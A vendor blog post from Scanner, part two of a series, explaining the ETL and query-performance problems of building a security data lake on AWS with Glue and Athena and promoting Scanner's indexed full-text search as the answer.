November 17, 2025

How to Build a Security Data Lake: ETL and search queries with high performance and low overhead (Part 2)

In the first part of this blog series we discussed why security data lakes are on the rise to overcome SIEM log storage limits and sky rocketing costs, the various options and tools available, and overcoming the first challenge of ingesting all your logs. 

Once all of your log sources are connected, the next challenge is to make the data queryable in a highly performant manner and run detections on top of it. This is where things get really interesting (often painful) for most organizations. 

Making Logs Queryable: The ETL Bottleneck

Once logs are in your data lake, the real challenge begins: turning raw JSON files into something searchable and usable. This is often the most difficult leg of the journey. What you initially have is a messy data swamp. How do you turn this into a usable data lake?  

Often the customers we work with are building their data lakes in AWS, so for the purposes of this blog we will focus on AWS as the starting point.  

Typically you may first use an ETL tool like AWS Glue to crawl over your S3 buckets and infer schema  and create tables in a data catalog. It determines the structure of S3 key paths and maps them to SQL table schema fields. This addresses the cataloging problem.

Amazon Athena is then often used to analyze the catalog.  When a SQL query is written, it determines which S3 key paths to filter and scan based on the logical SQL table from the schema (as inferred by AWS Glue). Athena then executes the query by scanning through those.

The challenge of messy security data

The reality is that security data rarely fits neatly into tables. Logs are often deeply nested, semi-structured, or text-heavy - think payload or request parameters, deeply nested WAF data, and EDR logs containing command-line strings. Additionally, the fields are inconsistent and often they will change over time as vendors modify their log output. 

Transforming these logs into tabular formats like Parquet requires complex ETL pipelines - flattening, normalizing, and converting data for compatibility.  To ease this process Amazon created its own Security Lake as well as the Open Cybersecurity Schema Framework (OCSF) format which really helps with certain types of data such as network flows. 

Query speeds increase nicely when searching for column-value pairs. If your SQL query performs efficiently in such scenarios, that's excellent. OCSF ensures a consistent schema across all these data sources.

While Amazon Security Lake offers some advantages, it falls short in supporting a wide range of SaaS sources such as Slack, GitHub, Salesforce, or Google Workspace logs directly. Converting these unsupported logs into the OCSF format presents a significant challenge. This can lead to a situation where some data is neatly organized, but a substantial portion remains in formats that are not well-suited for SQL, often being text-heavy, semi-structured, or messy JSON.

AWS services can be used with a data lake but you might also employ tools like Apache Spark for large-scale ETL jobs to flatten JSON and normalize schemas. Other options include Ray (a Python-based distributed computing environment) or custom pipelines like Cribl or dbt. The core task remains consistent: transforming messy JSON and CSV security logs into a structured, tabular format (like Parquet with a SQL schema).

The SQL misfit with security logs

Tabular data that naturally fits a SQL schema such as network flow logs works well with the SQL paradigm, a foundational approach for data lake data. Tools like Athena, Trino, or Apache Spark are typically used in this scenario, assuming your data fits neatly into tables.

However, many security logs, by nature, are semi-structured. While some fields align well with a SQL schema, others like request parameters, deeply nested WAF data, or EDR logs with extensive text and command-line entries do not. This creates a significant operational burden for each new log source. For instance, ingesting a new gzipped JSON log requires configuring AWS Glue crawlers to infer a schema, initiating ETL jobs, and transforming the data into a table. The traditional method for querying logs in S3 involves forcing them into SQL schemas using Glue, Athena, or Spark within a security data lake.

In our strong opinion, security logs with all their messy data, are not a good fit for being forced into a SQL schema. This represents the first wall security teams encounter when constructing a data lake.

The Query Performance Dilemma

The next big challenge is to solve how fast queries execute on large volumes of logs.

When a tool like Amazon Athena executes a query against a gzipped JSON file, it needs to fully decompress and then search through it every time. This is computationally extremely intensive.  Queries often take several minutes to hours to execute. In some cases the queries may even time out and not return anything. This becomes a major blocker for security engineering teams as they conduct their investigations. 

To illustrate, consider a common security investigation: searching 6 months of CloudTrail logs for S3 bucket policy changes on production buckets. Using Athena, you must scan all files across 180 days of daily log folders—approximately 10-15 terabytes of raw logs. Athena parses every JSON record, applies filters, and returns results after 30+ minutes of processing, costing $75-100 per query.

The primary reason for Athena's slowness in searching through log data is that partitioning is limited to directory structure. Athena can only prune based on what appears in the file path itself—typically date, account ID, and region. For queries filtering on fields buried in JSON like requestParameters.bucketName in CloudTrail logs, Athena cannot skip files without opening them. This means queries must still read and parse files across all matching time partitions. When searching a large time range—say 6 months to a year of logs—this can mean reading terabytes of data to answer a single question. Your partition strategy is thus constrained by file path structure, not by the actual field values you need to query.

The critical need for full-text search

A major hurdle for security teams adopting data lakes is the inability to perform full-text search on unstructured or "messy" logs. Security engineers are accustomed to this capability in traditional SIEMs but often lose it when moving to a data lake architecture. This is a significant drawback because critical security signals often reside within the noisy, unstructured parts of log data that don't conform to a neat schema.

Without the ability to search within these noisy log sections, it becomes nearly impossible to uncover signals related to threats like reverse shells, command and control traffic, or malicious scripts. Full-text search is essential for investigating:

  • Messy command-line arguments
  • Suspicious user-agent strings
  • Embedded payloads in HTTP requests
  • Unstructured authentication events or script contents

If this full-text search capability is missing, a large volume of critical security data remains effectively invisible within the data lake. Standard SQL query engines used in data lakes make full-text or substring searches infeasible. When implemented correctly, however, high-performance full-text search provides massive wins and significantly enhances investigation power. 

As mentioned earlier, Apple tried to tackle this problem themselves by utilizing S3 and Databricks Delta Lake. This move, which decoupled compute from storage, enabled them to handle petabytes of data ingestion daily. Furthermore, Apple developed custom Apache Lucene plugins for Apache Spark, which allowed for exceptionally high-performance regular expression and token-based searching across multi-petabyte indices. However, most security teams do not want to tackle such a complex data engineering project by themselves. 

The Cost And Complexity Of Build-Your-Own Data Lakes

As we have seen, many teams will attempt to build their own security data lakes initially, but run into roadblocks around ingestion, ETL, and painful query performance. The end result: 

  • High operational tax for teams maintaining pipelines.
  • Productivity hindered by very slow queries and lack of full-text search. 
  • Costly maintenance as the data lake grows.

The Next Generation of Log Querying

The future belongs to tools that embrace log complexity rather than fight it.

Next-generation search engines are designed to query unstructured or semi-structured data directly, without requiring rigid schemas or heavy transformations. They can index JSON, plaintext, or key-value logs and return results in seconds - enabling real-time investigation and detection across massive datasets.

This is where platforms like Scanner redefine what a security data lake can do.

Built for the messiness of security data

Where other solutions struggle with slow queries or narrow schemas, Scanner excels at speed, flexibility, and simplicity. You can retain all your logs - structured, unstructured, and everything in between - without paying SIEM-level storage or ingestion costs.

Traditional data lakes, even with optimizations like partitioning and columnar formats (e.g., Parquet), often struggle with the complexity of security logs. Scanner takes a fundamentally different approach. It's purpose-built to embrace the messiness of security data, delivering unparalleled search performance and cost efficiency compared to both traditional data lakes and legacy SIEMs.

Scanner achieves its speed by building inverted indexes directly on top of your data lake storage during ingestion. When data is imported, JSON is parsed once, and a lookup table is created that maps field values to the specific files containing them. This index is stored separately, allowing Scanner to identify and scan only the relevant data files during a query. This parallel execution and intelligent indexing mean that instead of scanning entire tables or partitions, Scanner skips irrelevant data, drastically reducing query times from minutes (or even hours) to mere seconds. We have seen our customers execute queries up to 700x faster than Amazon Athena for example. 

This architectural difference also translates into significant cost savings. Traditional data lakes incur higher costs due to the extensive data scanning required for complex queries, especially those involving deeply nested JSON or substring searches. Scanner's ability to scan only the necessary data results in a dramatic reduction in query costs, often by orders of magnitude. Furthermore, Scanner indexes semi-structured data like JSON fields at ingestion, eliminating the need for expensive, on-the-fly parsing during queries, a common bottleneck in traditional data lake solutions. This allows for direct and efficient querying of nested fields using simple dot notation.

Another huge bonus - Scanner enables super easy full-text search through all your log data. Search for any text in any field. No schema required. Find IPs, usernames, file paths, or error messages across all your logs with one query. 

In essence, Scanner redefines what a security data lake can do. It's not just about storing logs; it's about making years of logs instantly searchable and actionable, at a fraction of the cost of legacy SIEMs, by intelligently indexing and querying data directly within your own S3 buckets.

Next Steps - Detection

So far we have tackled the ingestion, transformation, and query phases of the security data lake journey. In our next part of this blog series, we will cover how to enable detections and monitoring on top of your security data lake. 

We believe that traditional log architectures are broken for modern log volumes. Scanner enables fast search and detections for log data lakes – directly in your S3 buckets. Reduce the total cost of ownership of logs by 80-90%.
Photo of Cliff Crosland
Cliff Crosland
CEO, Co-founder
Scanner, Inc.
Cliff is the CEO and co-founder of Scanner.dev, which provides fast search and threat detections for log data in S3. Prior to founding Scanner, he was a Principal Engineer at Cisco where he led the backend infrastructure team for the Webex People Graph. He was also the engineering lead for the data platform team at Accompany before its acquisition by Cisco. He has a love-hate relationship with Rust, but it's mostly love these days.